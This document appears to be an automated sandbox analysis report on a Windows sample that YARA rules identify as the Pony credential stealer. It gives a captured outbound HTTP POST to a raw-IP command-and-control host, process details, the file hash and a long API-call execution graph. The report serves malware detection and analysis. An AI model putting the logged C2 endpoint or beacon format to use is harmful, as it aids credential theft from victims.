                                      User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.45000767.215.225.20580806608C:\Users\user\Desktop\a5gvJhukP7.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 7, 2024 23:13:49.406102896 CEST273OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: 67.215.225.205
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Content-Length: 177
                                      Connection: close
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:17:11:58
                                      Start date:07/10/2024
                                      Path:C:\Users\user\Desktop\a5gvJhukP7.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\a5gvJhukP7.exe"
                                      Imagebase:0xba0000
                                      File size:135'168 bytes
                                      MD5 hash:18579D8151A242CF2E9B69B016479481
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, Author: unknown
                                      • Rule: pony, Description: Identify Pony, Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, Author: unknown
                                      • Rule: pony, Description: Identify Pony, Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:17:12:02
                                      Start date:07/10/2024
                                      Path:C:\Users\user\Desktop\a5gvJhukP7.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\a5gvJhukP7.exe"
                                      Imagebase:0xba0000
                                      File size:135'168 bytes
                                      MD5 hash:18579D8151A242CF2E9B69B016479481
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: pony, Description: Identify Pony, Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                      Reputation:low
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:14.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:11.7%
                                        Total number of Nodes:1105
                                        Total number of Limit Nodes:20
                                        execution_graph 3773 ba653a IsProcessorFeaturePresent 3774 ba40b8 3775 ba4f5a __calloc_crt 66 API calls 3774->3775 3776 ba40c4 EncodePointer 3775->3776 3777 ba40dd 3776->3777 3906 ba1298 3907 ba12a0 3906->3907 3907->3907 3908 ba229a __crtGetStringTypeA_stat 5 API calls 3907->3908 3909 ba12f3 3908->3909 3778 ba243f 3781 ba391f 3778->3781 3780 ba2444 3780->3780 3782 ba3951 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3781->3782 3783 ba3944 3781->3783 3784 ba3948 3782->3784 3783->3782 3783->3784 3784->3780 3785 ba58fd 3786 ba286c __amsg_exit 66 API calls 3785->3786 3787 ba5904 3786->3787 2668 ba22d2 2718 ba3730 2668->2718 2670 ba22de GetStartupInfoW 2671 ba22f2 HeapSetInformation 2670->2671 2673 ba22fd 2670->2673 2671->2673 2719 ba3710 HeapCreate 2673->2719 2674 ba234b 2677 ba2356 2674->2677 2785 ba22a9 2674->2785 2793 ba3595 GetModuleHandleW 2677->2793 2678 ba235c 2679 ba2368 __RTC_Initialize 2678->2679 2680 ba2360 2678->2680 2720 ba300b GetStartupInfoW 2679->2720 2681 ba22a9 _fast_error_exit 66 API calls 2680->2681 2682 ba2367 2681->2682 2682->2679 2685 ba2379 2818 ba286c 2685->2818 2686 ba2381 GetCommandLineA 2733 ba2f74 GetEnvironmentStringsW 2686->2733 2692 ba239b 2693 ba239f 2692->2693 2694 ba23a7 2692->2694 2696 ba286c __amsg_exit 66 API calls 2693->2696 2746 ba2c41 2694->2746 2698 ba23a6 2696->2698 2697 ba23ac 2699 ba23b8 2697->2699 2700 ba23b0 2697->2700 2698->2694 2766 ba264b 2699->2766 2701 ba286c __amsg_exit 66 API calls 2700->2701 2703 ba23b7 2701->2703 2703->2699 2704 ba23bf 2705 ba23cb 2704->2705 2706 ba23c4 2704->2706 2772 ba2be2 2705->2772 2707 ba286c __amsg_exit 66 API calls 2706->2707 2709 ba23ca 2707->2709 2709->2705 2710 ba23d0 2711 ba23d6 2710->2711 2778 ba2280 2710->2778 2711->2710 2714 ba23fa 2839 ba284e 2714->2839 2717 ba23ff __setmbcp 2718->2670 2719->2674 2842 ba4f5a 2720->2842 2722 ba2375 2722->2685 2722->2686 2723 ba319e 2724 ba31d4 GetStdHandle 2723->2724 2726 ba3238 SetHandleCount 2723->2726 2727 ba31e6 GetFileType 2723->2727 2731 ba320c InitializeCriticalSectionAndSpinCount 2723->2731 2724->2723 2725 ba4f5a __calloc_crt 66 API calls 2728 ba3029 2725->2728 2726->2722 2727->2723 2728->2722 2728->2723 2728->2725 2732 ba311e 2728->2732 2729 ba314a GetFileType 2730 ba3155 InitializeCriticalSectionAndSpinCount 2729->2730 2729->2732 2730->2722 2730->2732 2731->2722 2731->2723 2732->2723 2732->2729 2732->2730 2734 ba2391 2733->2734 2736 ba2f90 2733->2736 2825 ba2eb7 2734->2825 2735 ba2fa5 WideCharToMultiByte 2737 ba2ffd FreeEnvironmentStringsW 2735->2737 2738 ba2fc5 2735->2738 2736->2735 2736->2736 2737->2734 2739 ba4f15 __malloc_crt 66 API calls 2738->2739 2740 ba2fcb 2739->2740 2740->2737 2741 ba2fd3 WideCharToMultiByte 2740->2741 2742 ba2ff1 FreeEnvironmentStringsW 2741->2742 2743 ba2fe5 2741->2743 2742->2734 2744 ba4e7c _free 66 API calls 2743->2744 2745 ba2fed 2744->2745 2745->2742 2747 ba2c4a 2746->2747 2750 ba2c4f _strlen 2746->2750 3055 ba4e5e 2747->3055 2749 ba4f5a __calloc_crt 66 API calls 2755 ba2c84 _strlen 2749->2755 2750->2749 2753 ba2c5d 2750->2753 2751 ba2cd3 2752 ba4e7c _free 66 API calls 2751->2752 2752->2753 2753->2697 2754 ba4f5a __calloc_crt 66 API calls 2754->2755 2755->2751 2755->2753 2755->2754 2756 ba2cf9 2755->2756 2759 ba2d10 2755->2759 3059 ba4eb6 2755->3059 2757 ba4e7c _free 66 API calls 2756->2757 2757->2753 2760 ba3f14 __invoke_watson 10 API calls 2759->2760 2762 ba2d1c 2760->2762 2764 ba2da9 2762->2764 3068 ba4780 2762->3068 2763 ba2ea7 2763->2697 2764->2763 2765 ba4780 76 API calls _parse_cmdline 2764->2765 2765->2764 2768 ba2659 __IsNonwritableInCurrentImage 2766->2768 3514 ba413c 2768->3514 2769 ba2677 __initterm_e 2771 ba2698 __IsNonwritableInCurrentImage 2769->2771 3517 ba4125 2769->3517 2771->2704 2773 ba2bf0 2772->2773 2775 ba2bf5 2772->2775 2774 ba4e5e ___initmbctable 94 API calls 2773->2774 2774->2775 2776 ba2c31 2775->2776 2777 ba4780 _parse_cmdline 76 API calls 2775->2777 2776->2710 2777->2775 3582 ba1c70 GetVersionExA 2778->3582 2780 ba2285 2781 ba228a ExitProcess 2780->2781 2782 ba2292 2780->2782 3617 ba2110 2782->3617 2786 ba22bc 2785->2786 2787 ba22b7 2785->2787 2789 ba28b0 __NMSG_WRITE 66 API calls 2786->2789 2788 ba2a5f __FF_MSGBANNER 66 API calls 2787->2788 2788->2786 2790 ba22c4 2789->2790 2791 ba25ca _malloc 3 API calls 2790->2791 2792 ba22ce 2791->2792 2792->2677 2794 ba35a9 2793->2794 2795 ba35b2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 2793->2795 3701 ba32e2 2794->3701 2797 ba35fc TlsAlloc 2795->2797 2800 ba364a TlsSetValue 2797->2800 2801 ba370b 2797->2801 2800->2801 2802 ba365b 2800->2802 2801->2678 3711 ba25f4 2802->3711 2807 ba36a3 DecodePointer 2810 ba36b8 2807->2810 2808 ba3706 2809 ba32e2 __mtterm 70 API calls 2808->2809 2809->2801 2810->2808 2811 ba4f5a __calloc_crt 66 API calls 2810->2811 2812 ba36ce 2811->2812 2812->2808 2813 ba36d6 DecodePointer 2812->2813 2814 ba36e7 2813->2814 2814->2808 2815 ba36eb 2814->2815 2816 ba331f __getptd_noexit 66 API calls 2815->2816 2817 ba36f3 GetCurrentThreadId 2816->2817 2817->2801 2819 ba2a5f __FF_MSGBANNER 66 API calls 2818->2819 2820 ba2876 2819->2820 2821 ba28b0 __NMSG_WRITE 66 API calls 2820->2821 2822 ba287e 2821->2822 3722 ba2838 2822->3722 2826 ba2ecc 2825->2826 2827 ba2ed1 GetModuleFileNameA 2825->2827 2829 ba4e5e ___initmbctable 94 API calls 2826->2829 2828 ba2ef8 2827->2828 3755 ba2d1d 2828->3755 2829->2827 2832 ba4f15 __malloc_crt 66 API calls 2833 ba2f3a 2832->2833 2834 ba2d1d _parse_cmdline 76 API calls 2833->2834 2835 ba2f54 2833->2835 2834->2835 2835->2692 2836 ba2822 2837 ba26e2 _doexit 66 API calls 2836->2837 2838 ba2833 2837->2838 2838->2714 2840 ba26e2 _doexit 66 API calls 2839->2840 2841 ba2859 2840->2841 2841->2717 2844 ba4f63 2842->2844 2845 ba4fa0 2844->2845 2846 ba4f81 Sleep 2844->2846 2847 ba5cee 2844->2847 2845->2728 2846->2844 2848 ba5cfa 2847->2848 2854 ba5d15 2847->2854 2849 ba5d06 2848->2849 2848->2854 2856 ba3fef 2849->2856 2851 ba5d28 HeapAlloc 2853 ba5d4f 2851->2853 2851->2854 2853->2844 2854->2851 2854->2853 2859 ba3f85 DecodePointer 2854->2859 2861 ba33d3 GetLastError 2856->2861 2858 ba3ff4 2858->2844 2860 ba3f9a 2859->2860 2860->2854 2875 ba32ae TlsGetValue 2861->2875 2864 ba3440 SetLastError 2864->2858 2865 ba4f5a __calloc_crt 62 API calls 2866 ba33fe 2865->2866 2866->2864 2867 ba3406 DecodePointer 2866->2867 2868 ba341b 2867->2868 2869 ba341f 2868->2869 2870 ba3437 2868->2870 2878 ba331f 2869->2878 2891 ba4e7c 2870->2891 2873 ba3427 GetCurrentThreadId 2873->2864 2874 ba343d 2874->2864 2876 ba32de 2875->2876 2877 ba32c3 DecodePointer TlsSetValue 2875->2877 2876->2864 2876->2865 2877->2876 2897 ba3730 2878->2897 2880 ba332b GetModuleHandleW 2898 ba3b86 2880->2898 2882 ba3369 InterlockedIncrement 2905 ba33c1 2882->2905 2885 ba3b86 __lock 64 API calls 2886 ba338a 2885->2886 2908 ba4ff7 InterlockedIncrement 2886->2908 2888 ba33a8 2920 ba33ca 2888->2920 2890 ba33b5 __setmbcp 2890->2873 2892 ba4e87 HeapFree 2891->2892 2896 ba4eb0 _free 2891->2896 2893 ba4e9c 2892->2893 2892->2896 2894 ba3fef _malloc 64 API calls 2893->2894 2895 ba4ea2 GetLastError 2894->2895 2895->2896 2896->2874 2897->2880 2899 ba3b9b 2898->2899 2900 ba3bae EnterCriticalSection 2898->2900 2923 ba3ac4 2899->2923 2900->2882 2902 ba3ba1 2902->2900 2903 ba286c __amsg_exit 65 API calls 2902->2903 2904 ba3bad 2903->2904 2904->2900 3053 ba3aad LeaveCriticalSection 2905->3053 2907 ba3383 2907->2885 2909 ba5018 2908->2909 2910 ba5015 InterlockedIncrement 2908->2910 2911 ba5022 InterlockedIncrement 2909->2911 2912 ba5025 2909->2912 2910->2909 2911->2912 2913 ba502f InterlockedIncrement 2912->2913 2914 ba5032 2912->2914 2913->2914 2915 ba503c InterlockedIncrement 2914->2915 2917 ba503f 2914->2917 2915->2917 2916 ba5058 InterlockedIncrement 2916->2917 2917->2916 2918 ba5068 InterlockedIncrement 2917->2918 2919 ba5073 InterlockedIncrement 2917->2919 2918->2917 2919->2888 3054 ba3aad LeaveCriticalSection 2920->3054 2922 ba33d1 2922->2890 2924 ba3ad0 __setmbcp 2923->2924 2925 ba3af6 2924->2925 2948 ba2a5f 2924->2948 2931 ba3b06 __setmbcp 2925->2931 2980 ba4f15 2925->2980 2931->2902 2933 ba3b18 2937 ba3fef _malloc 65 API calls 2933->2937 2934 ba3b27 2935 ba3b86 __lock 65 API calls 2934->2935 2938 ba3b2e 2935->2938 2937->2931 2939 ba3b61 2938->2939 2940 ba3b36 InitializeCriticalSectionAndSpinCount 2938->2940 2943 ba4e7c _free 65 API calls 2939->2943 2941 ba3b52 2940->2941 2942 ba3b46 2940->2942 2985 ba3b7d 2941->2985 2944 ba4e7c _free 65 API calls 2942->2944 2943->2941 2945 ba3b4c 2944->2945 2947 ba3fef _malloc 65 API calls 2945->2947 2947->2941 2988 ba4667 2948->2988 2950 ba2a66 2951 ba2a73 2950->2951 2952 ba4667 __FF_MSGBANNER 66 API calls 2950->2952 2953 ba28b0 __NMSG_WRITE 66 API calls 2951->2953 2955 ba2a95 2951->2955 2952->2951 2954 ba2a8b 2953->2954 2956 ba28b0 __NMSG_WRITE 66 API calls 2954->2956 2957 ba28b0 2955->2957 2956->2955 2958 ba28d1 __NMSG_WRITE 2957->2958 2960 ba4667 __FF_MSGBANNER 63 API calls 2958->2960 2976 ba29ed 2958->2976 2962 ba28eb 2960->2962 2961 ba2a5d 2977 ba25ca 2961->2977 2963 ba29fc GetStdHandle 2962->2963 2964 ba4667 __FF_MSGBANNER 63 API calls 2962->2964 2966 ba2a0a _strlen 2963->2966 2963->2976 2965 ba28fc 2964->2965 2965->2963 2967 ba290e 2965->2967 2968 ba2a40 WriteFile 2966->2968 2966->2976 2969 ba293a GetModuleFileNameW 2967->2969 2971 ba295b _wcslen 2967->2971 2967->2976 2968->2976 2969->2971 2972 ba44a7 63 API calls __NMSG_WRITE 2971->2972 2974 ba29dd 2971->2974 2995 ba3f14 2971->2995 2998 ba451c 2971->2998 2972->2971 3007 ba433b 2974->3007 3025 ba229a 2976->3025 3033 ba259f GetModuleHandleW 2977->3033 2984 ba4f1e 2980->2984 2982 ba3b11 2982->2933 2982->2934 2983 ba4f35 Sleep 2983->2984 2984->2982 2984->2983 3036 ba5c5a 2984->3036 3052 ba3aad LeaveCriticalSection 2985->3052 2987 ba3b84 2987->2931 2989 ba4673 2988->2989 2990 ba3fef _malloc 66 API calls 2989->2990 2991 ba467d 2989->2991 2992 ba4696 2990->2992 2991->2950 2993 ba3f66 _strcpy_s 11 API calls 2992->2993 2994 ba46a1 2993->2994 2994->2950 2996 ba3deb __call_reportfault 8 API calls 2995->2996 2997 ba3f26 GetCurrentProcess TerminateProcess 2996->2997 2997->2971 3003 ba452e 2998->3003 2999 ba4532 3000 ba3fef _malloc 66 API calls 2999->3000 3001 ba4537 2999->3001 3002 ba454e 3000->3002 3001->2971 3004 ba3f66 _strcpy_s 11 API calls 3002->3004 3003->2999 3003->3001 3005 ba4575 3003->3005 3004->3001 3005->3001 3006 ba3fef _malloc 66 API calls 3005->3006 3006->3002 3008 ba329c ___crtMessageBoxW EncodePointer 3007->3008 3009 ba4361 3008->3009 3010 ba43ee 3009->3010 3011 ba4371 LoadLibraryW 3009->3011 3014 ba4408 DecodePointer DecodePointer 3010->3014 3022 ba441b 3010->3022 3012 ba4486 3011->3012 3013 ba4386 GetProcAddress 3011->3013 3018 ba229a __crtGetStringTypeA_stat 5 API calls 3012->3018 3013->3012 3017 ba439c 7 API calls 3013->3017 3014->3022 3015 ba447a DecodePointer 3015->3012 3016 ba4451 DecodePointer 3016->3015 3019 ba4458 3016->3019 3017->3010 3020 ba43de GetProcAddress EncodePointer 3017->3020 3021 ba44a5 3018->3021 3019->3015 3023 ba446b DecodePointer 3019->3023 3020->3010 3021->2976 3022->3015 3022->3016 3024 ba443e 3022->3024 3023->3015 3023->3024 3024->3015 3026 ba22a2 3025->3026 3027 ba22a4 IsDebuggerPresent 3025->3027 3026->2961 3029 ba39ba __call_reportfault 3027->3029 3030 ba2516 SetUnhandledExceptionFilter UnhandledExceptionFilter 3029->3030 3031 ba253b GetCurrentProcess TerminateProcess 3030->3031 3032 ba2533 __call_reportfault 3030->3032 3031->2961 3032->3031 3034 ba25c3 ExitProcess 3033->3034 3035 ba25b3 GetProcAddress 3033->3035 3035->3034 3037 ba5cd7 3036->3037 3043 ba5c68 3036->3043 3038 ba3f85 _malloc DecodePointer 3037->3038 3039 ba5cdd 3038->3039 3040 ba3fef _malloc 65 API calls 3039->3040 3051 ba5ccf 3040->3051 3041 ba2a5f __FF_MSGBANNER 65 API calls 3041->3043 3042 ba5c96 HeapAlloc 3042->3043 3042->3051 3043->3041 3043->3042 3044 ba28b0 __NMSG_WRITE 65 API calls 3043->3044 3045 ba5cc3 3043->3045 3046 ba25ca _malloc GetModuleHandleW GetProcAddress ExitProcess 3043->3046 3047 ba3f85 _malloc DecodePointer 3043->3047 3049 ba5cc1 3043->3049 3044->3043 3048 ba3fef _malloc 65 API calls 3045->3048 3046->3043 3047->3043 3048->3049 3050 ba3fef _malloc 65 API calls 3049->3050 3050->3051 3051->2984 3052->2987 3053->2907 3054->2922 3056 ba4e67 3055->3056 3058 ba4e6e 3055->3058 3071 ba4cc4 3056->3071 3058->2750 3060 ba4ecb 3059->3060 3061 ba4ec4 3059->3061 3062 ba3fef _malloc 66 API calls 3060->3062 3061->3060 3065 ba4ee9 3061->3065 3063 ba4ed0 3062->3063 3502 ba3f66 3063->3502 3066 ba4eda 3065->3066 3067 ba3fef _malloc 66 API calls 3065->3067 3066->2755 3067->3063 3511 ba472d 3068->3511 3072 ba4cd0 __setmbcp 3071->3072 3102 ba344c 3072->3102 3076 ba4ce3 3123 ba4a5f 3076->3123 3079 ba4f15 __malloc_crt 66 API calls 3080 ba4d04 3079->3080 3081 ba4e23 __setmbcp 3080->3081 3130 ba4adb 3080->3130 3081->3058 3084 ba4d34 InterlockedDecrement 3085 ba4d44 3084->3085 3086 ba4d55 InterlockedIncrement 3084->3086 3085->3086 3091 ba4e7c _free 66 API calls 3085->3091 3086->3081 3087 ba4d6b 3086->3087 3087->3081 3094 ba3b86 __lock 66 API calls 3087->3094 3088 ba4e30 3088->3081 3089 ba4e43 3088->3089 3092 ba4e7c _free 66 API calls 3088->3092 3090 ba3fef _malloc 66 API calls 3089->3090 3090->3081 3093 ba4d54 3091->3093 3092->3089 3093->3086 3096 ba4d7f InterlockedDecrement 3094->3096 3097 ba4dfb 3096->3097 3098 ba4e0e InterlockedIncrement 3096->3098 3097->3098 3100 ba4e7c _free 66 API calls 3097->3100 3140 ba4e25 3098->3140 3101 ba4e0d 3100->3101 3101->3098 3103 ba33d3 __getptd_noexit 66 API calls 3102->3103 3104 ba3454 3103->3104 3105 ba3461 3104->3105 3106 ba286c __amsg_exit 66 API calls 3104->3106 3107 ba49bb 3105->3107 3106->3105 3108 ba49c7 __setmbcp 3107->3108 3109 ba344c __getptd 66 API calls 3108->3109 3110 ba49cc 3109->3110 3111 ba3b86 __lock 66 API calls 3110->3111 3112 ba49de 3110->3112 3113 ba49fc 3111->3113 3115 ba49ec __setmbcp 3112->3115 3119 ba286c __amsg_exit 66 API calls 3112->3119 3114 ba4a45 3113->3114 3116 ba4a2d InterlockedIncrement 3113->3116 3117 ba4a13 InterlockedDecrement 3113->3117 3143 ba4a56 3114->3143 3115->3076 3116->3114 3117->3116 3120 ba4a1e 3117->3120 3119->3115 3120->3116 3121 ba4e7c _free 66 API calls 3120->3121 3122 ba4a2c 3121->3122 3122->3116 3147 ba46a6 3123->3147 3126 ba4a7e GetOEMCP 3129 ba4a8e 3126->3129 3127 ba4a9c 3128 ba4aa1 GetACP 3127->3128 3127->3129 3128->3129 3129->3079 3129->3081 3131 ba4a5f getSystemCP 78 API calls 3130->3131 3133 ba4afb 3131->3133 3132 ba229a __crtGetStringTypeA_stat 5 API calls 3134 ba4cc2 3132->3134 3135 ba4b4a IsValidCodePage 3133->3135 3137 ba4b06 setSBCS 3133->3137 3139 ba4b6f _memset __setmbcp_nolock 3133->3139 3134->3084 3134->3088 3136 ba4b5c GetCPInfo 3135->3136 3135->3137 3136->3137 3136->3139 3137->3132 3440 ba482b GetCPInfo 3139->3440 3501 ba3aad LeaveCriticalSection 3140->3501 3142 ba4e2c 3142->3081 3146 ba3aad LeaveCriticalSection 3143->3146 3145 ba4a5d 3145->3112 3146->3145 3148 ba46b9 3147->3148 3154 ba4706 3147->3154 3149 ba344c __getptd 66 API calls 3148->3149 3150 ba46be 3149->3150 3151 ba46e6 3150->3151 3155 ba52b7 3150->3155 3153 ba49bb __setmbcp 68 API calls 3151->3153 3151->3154 3153->3154 3154->3126 3154->3127 3156 ba52c3 __setmbcp 3155->3156 3157 ba344c __getptd 66 API calls 3156->3157 3158 ba52c8 3157->3158 3159 ba52f6 3158->3159 3161 ba52da 3158->3161 3160 ba3b86 __lock 66 API calls 3159->3160 3162 ba52fd 3160->3162 3163 ba344c __getptd 66 API calls 3161->3163 3170 ba526a 3162->3170 3165 ba52df 3163->3165 3167 ba52ed __setmbcp 3165->3167 3169 ba286c __amsg_exit 66 API calls 3165->3169 3167->3151 3169->3167 3171 ba5277 3170->3171 3177 ba52ac 3170->3177 3172 ba4ff7 ___addlocaleref 8 API calls 3171->3172 3171->3177 3173 ba528d 3172->3173 3173->3177 3181 ba5086 3173->3181 3178 ba5324 3177->3178 3439 ba3aad LeaveCriticalSection 3178->3439 3180 ba532b 3180->3165 3182 ba511a 3181->3182 3183 ba5097 InterlockedDecrement 3181->3183 3182->3177 3195 ba511f 3182->3195 3184 ba50af 3183->3184 3185 ba50ac InterlockedDecrement 3183->3185 3186 ba50b9 InterlockedDecrement 3184->3186 3187 ba50bc 3184->3187 3185->3184 3186->3187 3188 ba50c9 3187->3188 3189 ba50c6 InterlockedDecrement 3187->3189 3190 ba50d3 InterlockedDecrement 3188->3190 3192 ba50d6 3188->3192 3189->3188 3190->3192 3191 ba50ef InterlockedDecrement 3191->3192 3192->3191 3193 ba50ff InterlockedDecrement 3192->3193 3194 ba510a InterlockedDecrement 3192->3194 3193->3192 3194->3182 3196 ba51a3 3195->3196 3197 ba5136 3195->3197 3198 ba51f0 3196->3198 3199 ba4e7c _free 66 API calls 3196->3199 3197->3196 3206 ba4e7c _free 66 API calls 3197->3206 3208 ba516a 3197->3208 3213 ba5219 3198->3213 3265 ba5e1d 3198->3265 3201 ba51c4 3199->3201 3203 ba4e7c _free 66 API calls 3201->3203 3209 ba51d7 3203->3209 3204 ba4e7c _free 66 API calls 3210 ba5198 3204->3210 3205 ba525e 3211 ba4e7c _free 66 API calls 3205->3211 3212 ba515f 3206->3212 3207 ba4e7c _free 66 API calls 3207->3213 3214 ba4e7c _free 66 API calls 3208->3214 3224 ba518b 3208->3224 3215 ba4e7c _free 66 API calls 3209->3215 3219 ba4e7c _free 66 API calls 3210->3219 3220 ba5264 3211->3220 3225 ba61fd 3212->3225 3213->3205 3218 ba4e7c 66 API calls _free 3213->3218 3216 ba5180 3214->3216 3217 ba51e5 3215->3217 3253 ba6194 3216->3253 3223 ba4e7c _free 66 API calls 3217->3223 3218->3213 3219->3196 3220->3177 3223->3198 3224->3204 3226 ba620e 3225->3226 3252 ba62f7 3225->3252 3227 ba621f 3226->3227 3228 ba4e7c _free 66 API calls 3226->3228 3229 ba6231 3227->3229 3230 ba4e7c _free 66 API calls 3227->3230 3228->3227 3231 ba6243 3229->3231 3232 ba4e7c _free 66 API calls 3229->3232 3230->3229 3233 ba6255 3231->3233 3234 ba4e7c _free 66 API calls 3231->3234 3232->3231 3235 ba4e7c _free 66 API calls 3233->3235 3237 ba6267 3233->3237 3234->3233 3235->3237 3236 ba6279 3239 ba628b 3236->3239 3240 ba4e7c _free 66 API calls 3236->3240 3237->3236 3238 ba4e7c _free 66 API calls 3237->3238 3238->3236 3241 ba629d 3239->3241 3243 ba4e7c _free 66 API calls 3239->3243 3240->3239 3242 ba62af 3241->3242 3244 ba4e7c _free 66 API calls 3241->3244 3245 ba62c1 3242->3245 3246 ba4e7c _free 66 API calls 3242->3246 3243->3241 3244->3242 3247 ba62d3 3245->3247 3248 ba4e7c _free 66 API calls 3245->3248 3246->3245 3249 ba62e5 3247->3249 3250 ba4e7c _free 66 API calls 3247->3250 3248->3247 3251 ba4e7c _free 66 API calls 3249->3251 3249->3252 3250->3249 3251->3252 3252->3208 3254 ba61a1 3253->3254 3264 ba61f9 3253->3264 3255 ba61b1 3254->3255 3256 ba4e7c _free 66 API calls 3254->3256 3257 ba61c3 3255->3257 3258 ba4e7c _free 66 API calls 3255->3258 3256->3255 3259 ba61d5 3257->3259 3260 ba4e7c _free 66 API calls 3257->3260 3258->3257 3261 ba61e7 3259->3261 3262 ba4e7c _free 66 API calls 3259->3262 3260->3259 3263 ba4e7c _free 66 API calls 3261->3263 3261->3264 3262->3261 3263->3264 3264->3224 3266 ba5e2e 3265->3266 3267 ba520e 3265->3267 3268 ba4e7c _free 66 API calls 3266->3268 3267->3207 3269 ba5e36 3268->3269 3270 ba4e7c _free 66 API calls 3269->3270 3271 ba5e3e 3270->3271 3272 ba4e7c _free 66 API calls 3271->3272 3273 ba5e46 3272->3273 3274 ba4e7c _free 66 API calls 3273->3274 3275 ba5e4e 3274->3275 3276 ba4e7c _free 66 API calls 3275->3276 3277 ba5e56 3276->3277 3278 ba4e7c _free 66 API calls 3277->3278 3279 ba5e5e 3278->3279 3280 ba4e7c _free 66 API calls 3279->3280 3281 ba5e65 3280->3281 3282 ba4e7c _free 66 API calls 3281->3282 3283 ba5e6d 3282->3283 3284 ba4e7c _free 66 API calls 3283->3284 3285 ba5e75 3284->3285 3286 ba4e7c _free 66 API calls 3285->3286 3287 ba5e7d 3286->3287 3288 ba4e7c _free 66 API calls 3287->3288 3289 ba5e85 3288->3289 3290 ba4e7c _free 66 API calls 3289->3290 3291 ba5e8d 3290->3291 3292 ba4e7c _free 66 API calls 3291->3292 3293 ba5e95 3292->3293 3294 ba4e7c _free 66 API calls 3293->3294 3295 ba5e9d 3294->3295 3296 ba4e7c _free 66 API calls 3295->3296 3297 ba5ea5 3296->3297 3298 ba4e7c _free 66 API calls 3297->3298 3299 ba5ead 3298->3299 3300 ba4e7c _free 66 API calls 3299->3300 3301 ba5eb8 3300->3301 3302 ba4e7c _free 66 API calls 3301->3302 3303 ba5ec0 3302->3303 3304 ba4e7c _free 66 API calls 3303->3304 3305 ba5ec8 3304->3305 3306 ba4e7c _free 66 API calls 3305->3306 3307 ba5ed0 3306->3307 3308 ba4e7c _free 66 API calls 3307->3308 3309 ba5ed8 3308->3309 3310 ba4e7c _free 66 API calls 3309->3310 3311 ba5ee0 3310->3311 3312 ba4e7c _free 66 API calls 3311->3312 3313 ba5ee8 3312->3313 3314 ba4e7c _free 66 API calls 3313->3314 3315 ba5ef0 3314->3315 3316 ba4e7c _free 66 API calls 3315->3316 3317 ba5ef8 3316->3317 3318 ba4e7c _free 66 API calls 3317->3318 3319 ba5f00 3318->3319 3320 ba4e7c _free 66 API calls 3319->3320 3321 ba5f08 3320->3321 3322 ba4e7c _free 66 API calls 3321->3322 3323 ba5f10 3322->3323 3324 ba4e7c _free 66 API calls 3323->3324 3325 ba5f18 3324->3325 3326 ba4e7c _free 66 API calls 3325->3326 3327 ba5f20 3326->3327 3328 ba4e7c _free 66 API calls 3327->3328 3329 ba5f28 3328->3329 3330 ba4e7c _free 66 API calls 3329->3330 3331 ba5f30 3330->3331 3332 ba4e7c _free 66 API calls 3331->3332 3333 ba5f3e 3332->3333 3334 ba4e7c _free 66 API calls 3333->3334 3335 ba5f49 3334->3335 3336 ba4e7c _free 66 API calls 3335->3336 3337 ba5f54 3336->3337 3338 ba4e7c _free 66 API calls 3337->3338 3339 ba5f5f 3338->3339 3340 ba4e7c _free 66 API calls 3339->3340 3341 ba5f6a 3340->3341 3342 ba4e7c _free 66 API calls 3341->3342 3343 ba5f75 3342->3343 3344 ba4e7c _free 66 API calls 3343->3344 3345 ba5f80 3344->3345 3346 ba4e7c _free 66 API calls 3345->3346 3347 ba5f8b 3346->3347 